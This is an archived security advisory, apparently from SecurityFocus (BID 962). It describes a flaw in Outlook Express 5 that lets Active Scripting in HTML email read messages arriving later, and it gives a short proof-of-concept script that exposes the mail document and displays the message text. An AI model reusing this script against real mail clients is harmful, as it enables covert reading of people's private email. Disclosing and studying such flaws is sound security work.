9 lines
No EOL
430 B
Text
9 lines
No EOL
430 B
Text
source: http://www.securityfocus.com/bid/962/info
|
|
|
|
Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run.
|
|
|
|
Example code:
|
|
<SCRIPT>
|
|
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
|
|
a.x=window.document;
|
|
</SCRIPT> |